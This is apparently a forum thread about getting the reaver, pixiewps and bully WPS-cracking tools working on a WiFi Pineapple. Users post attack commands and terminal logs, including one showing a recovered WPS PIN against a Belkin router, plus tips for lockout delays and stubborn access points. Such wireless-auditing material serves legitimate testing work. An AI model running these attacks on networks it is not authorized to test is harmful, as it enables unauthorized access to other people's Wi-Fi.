
[Release] pixiewps 1.1 & reaver 1.5.2


DataHead


Wash and bully work with the disabled wlan1, though I have to prevent WPS lockout somehow.

root@WIN7B2:~# bully mon0 -b A0:F3:B2:E4:3A:62 -e "myAP" -c 4
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '4'
[!] Using '00:15:25:94:44:11' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'a0:f3:b2:e4:3a:62' on channel '4'
[+] Got beacon for 'myAP' (a0:f3:b2:e4:3a:62)
[+] Loading randomized pins from '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '44421090'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '50901098'
[+] Rx( Auth ) = 'Timeout'   Next pin '50901098'
[+] Rx( Assn ) = 'Timeout'   Next pin '50901098'
[+] Rx( Auth ) = 'Timeout'   Next pin '50901098'
[+] Rx( Assn ) = 'Timeout'   Next pin '50901098'
[+] Rx( Assn ) = 'Timeout'   Next pin '50901098'
[!] Received M2D or out of sequence WPS Message
[+] Rx(  M5  ) = 'WPSFail'   Next pin '50901098'
[+] Rx( Auth ) = 'Timeout'   Next pin '50901098'
[+] Rx( Assn ) = 'Timeout'   Next pin '50901098'
[+] Rx( Assn ) = 'Timeout'   Next pin '50901098'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '10541098'
[+] Rx( Auth ) = 'Timeout'   Next pin '10541098'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '10541098'
[+] Rx( Assn ) = 'Timeout'   Next pin '10541098'
[+] Rx( Assn ) = 'Timeout'   Next pin '10541098'
[+] Rx( Auth ) = 'Timeout'   Next pin '10541098'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '11481096'
[+] Rx( Auth ) = 'Timeout'   Next pin '11481096'
[+] Rx( Assn ) = 'Timeout'   Next pin '11481096'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '85851092'
[!] WPS lockout reported, sleeping for 43 seconds ...
[!] WPS lockout reported, sleeping for 43 seconds ...

Current Disk Usage:

Filesystem                Size      Used Available Use% Mounted on
rootfs                    3.2M    740.0K      2.5M  23% /
/dev/root                11.8M     11.8M         0 100% /rom
tmpfs                    30.2M    124.0K     30.1M   0% /tmp
tmpfs                   512.0K         0    512.0K   0% /dev
/dev/mtdblock3            3.2M    740.0K      2.5M  23% /overlay
overlayfs:/overlay        3.2M    740.0K      2.5M  23% /
/dev/sdcard/sd1           2.8G    106.0M      2.5G   4% /sd


Current Memory Usage:

             total         used         free       shared      buffers
Mem:         61804        43664        18140            0         6152
-/+ buffers:              37512        24292
Swap:      1000132            0      1000132

Here is my disk usage.

Unfortunately reaver still gives me the same errors as before.

Thanks for the help.


Okay, doing a wash scan via ssh,

try taking down the monitor mode enabled device before using wash / reaver / bully.

After another reset I installed reaver and bully on the sd card but either cannot associate or never sends a pin.

mkdir /etc/reaver

opkg update

opkg -d sd install reaver

ln -s /sd/etc/reaver/reaver.db /etc/reaver/

ln -s /sd/usr/bin/reaver /usr/bin/

ln -s /sd/usr/bin/wash /usr/bin/

:blink:


  • 1 month later...

Hello guys, I'm having an issue with reaver not getting the correct information from the AP to do a successful reaver attack. I've tried the same AP on Kali and it gets the pin and passphrase. Any help would be appreciated!! Thank you.

root@Pineapple:~# reaver -i wlan1mon -c7 -b XX:XX:XX:53:12:6C -vvv -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Switching wlan1mon to channel 7
[+] Waiting for beacon from XX:XX:XX:53:12:6C
[+] Associated with XX:XX:XX:53:12:6C (ESSID: Mascato)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 1142bb9d3b345c4655f269e279a47ac8
[P] PKE: d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b
[P] WPS Manufacturer: Belkin International
[P] WPS Model Name: Belkin N600DB Wireless Router
[P] WPS Model Number: F9K1102 v2
[P] Access Point Serial Number: 20422GF2204541
[+] Received M1 message
[P] R-Nonce: aa2e55a0e5abae5201c8c664efb46df6
[P] PKR: 4c24122323090189f6e58696e76769aceff61432b8aa4fcea7ff12eeaefd42cd52d2a56077452875df2419e0544192ad03287838d6e1811c887f123b1e87e2a00863e1b6a93216677e8e9f7f1f6280ba8eb13dbf2a56eb30478636bf4fa650bdbb436c7dbf198b622ff10e505a66d7e6452eb2fe25c7b06f448d4d79681adfd28f30395c656bf1ac5295f1ecfaf0bd0966497e1cf11ce02f0a6f6033e8fd66e3f6affdf0f5f42ded54ee7e61c3add7b810b6178e941d0a78b3384aeb61925d51
[P] AuthKey: 6111f2697163f20b7a7aee495b94b8ccd3f080904c0038765e0cbd91e057f393
[+] Sending M2 message
[P] E-Hash1: dd1337c644e08b60bdedd33c558ec78713364d3ea7a76d110f49a886f39918b4
[P] E-Hash2: d437d4e3a0bcb16bcb4124162e6f5ccd21e5a3a5d5ed2d8e0a483c79113ddf4e
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 12 s 80 ms
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
root@Pineapple:~#
root@kali11:/home/chris# reaver -i wlan1mon -c 7 -b XX:XX:XX:XX:XX:XX -vvv -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Switching wlan1mon to channel 7
[+] Waiting for beacon from XX:XX:XX:53:12:6C
[+] Associated with XX:XX:XX:53:12:6C (ESSID: Mascato)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 3e:2b:ce:1b:1d:a2:da:88:6f:b1:ea:f9:0e:7f:12:c5
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Belkin International
[P] WPS Model Name: Belkin N600DB Wireless Router
[P] WPS Model Number: F9K1102 v2
[P] Access Point Serial Number: 20422GF2204541
[+] Received M1 message
[P] R-Nonce: 5b:95:e2:eb:9e:ee:fb:be:b3:d8:23:8e:83:8a:1e:45
[P] PKR: 51:aa:9d:86:4e:69:69:00:b7:c1:63:ae:4c:88:fb:00:80:25:be:06:e1:ec:27:49:51:25:cd:9f:7b:56:19:a3:de:98:ee:98:e8:f5:ae:90:3e:68:14:12:0f:de:5b:b9:c9:f3:69:9b:e8:d8:29:a1:7d:c8:9b:86:c1:d1:17:40:2c:ea:69:74:70:91:74:c2:b7:49:1e:00:ce:8a:de:9e:e0:b1:e8:bb:d7:64:96:9f:d3:d6:e6:a2:09:af:da:c2:af:a2:3f:7d:02:db:d2:1b:65:c9:ef:ef:f6:ca:af:4f:d4:0e:43:53:10:01:ca:d8:73:40:57:8a:b1:26:d3:fc:2d:85:cf:2f:59:53:89:cb:e2:00:ca:b6:6d:d4:3b:c3:fe:70:7c:36:6d:9e:0c:db:f6:0a:f0:96:fc:d3:1a:ac:23:34:d2:e9:4c:4f:87:d7:77:82:bc:2c:5d:20:d7:df:1f:f8:a1:44:4b:5a:50:25:d0:a4:fb:3d:15:b4:11:06
[P] AuthKey: bb:74:56:24:e7:dd:ac:a7:8a:09:1e:a2:d9:60:ec:43:83:66:59:16:e7:3e:36:dd:57:9a:33:30:51:ea:86:3c
[+] Sending M2 message
[P] E-Hash1: af:c3:d0:f7:e9:b8:8f:16:37:89:bf:79:24:1e:99:d9:0f:8e:ce:2e:2c:9b:14:9c:a3:7c:74:4b:a9:eb:03:75
[P] E-Hash2: 9b:9f:14:f8:55:90:5d:b6:18:8d:93:7b:86:e1:f0:5e:d7:34:ed:a3:06:4e:6b:0a:37:8b:e5:ab:ed:a0:d3:b3
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [*] E-S1: 2c:19:f3:d0:12:83:8d:81:56:b0:c8:7d:37:8f:9a:15
[Pixie-Dust] [*] E-S2: 2c:19:f3:d0:12:83:8d:81:56:b0:c8:7d:37:8f:9a:15
[Pixie-Dust] [+] WPS pin: 14987236
[Pixie-Dust]
[+] Running reaver with the correct pin, wait ...
[+] Cmd : reaver -i wlan1mon -b 94:10:3E:53:12:6C -c 7 -s y -vv -p 14987236
[Reaver Test] [+] BSSID: XX:XX:XX:53:12:6C
[Reaver Test] [+] Channel: 7
[Reaver Test] [+] WPS PIN: '14987236'
[Reaver Test] [+] WPA PSK: 'XXXXXXXX'
[Reaver Test] [+] AP SSID: 'XXXXXX'

  • 3 months later...

For me it tries the same pin over and over. How do I change the arguments so it doesn't ignore it and tries a new pin even if it doesn't get a nack?

I'm not sure that you can... Have you tried playing around with the arguments though? For picky access points I've found -N for no nacks helps, and increasing delays. Even the -n for other nack related... Maybe -w act like a windows registrar... I know I've had that feeling too that, maybe it is getting it, just not telling me... However when changing it to the correct pin, and it's still failing, well maybe the access point is being clever or something... I've also noticed sometimes you have to manually associate with aireplay-ng as for some reason reaver itself has trouble associating with certain APs... Basically exhaust all possibilities with the switches! :smile:


  • 4 weeks later...

I’ve been trying to get reaver working on the nano for about 5 hours now...

Wash reports nothing with WPS, Airodump does. Reaver is working from another device on my router, just not from the nano. I've tried using external NICs on the pineapple as well; I'm using the version in the pineapple's repos.

I've also tried taking wlan1 down before and after and doing airmon-ng check kill, trying all parameters in wash.

Any ideas?

CH  6 ][ Elapsed: 12 s ][ 2016-01-27 08:08                                         
                                                                                                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS     ESSID
                                                                                                                                                                                             
 10:6F:3F:62:04:59  -58 100      135     1510  102   6  54e  WPA2 CCMP   PSK  1.0     Buffalo Soldier                                                                                        
                                                                                                                                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                  
root@Pineapple:/usr/lib# wash -i wlan1mon

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
--------------------------------------------------------------------------------------
root@Pineapple:/usr/lib# reaver -i wlan1mon -b 10:6F:3F:62:04:59 -c 6

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Waiting for beacon from 10:6F:3F:62:04:59
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[+] Associated with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)

  • 3 months later...
37 minutes ago, zabses said:

Hello! :wink:

Share please Make file for reaver_Big_endian-2

 

To be honest you can use a tool called https://github.com/aanarchyy/bully with a bit of work.
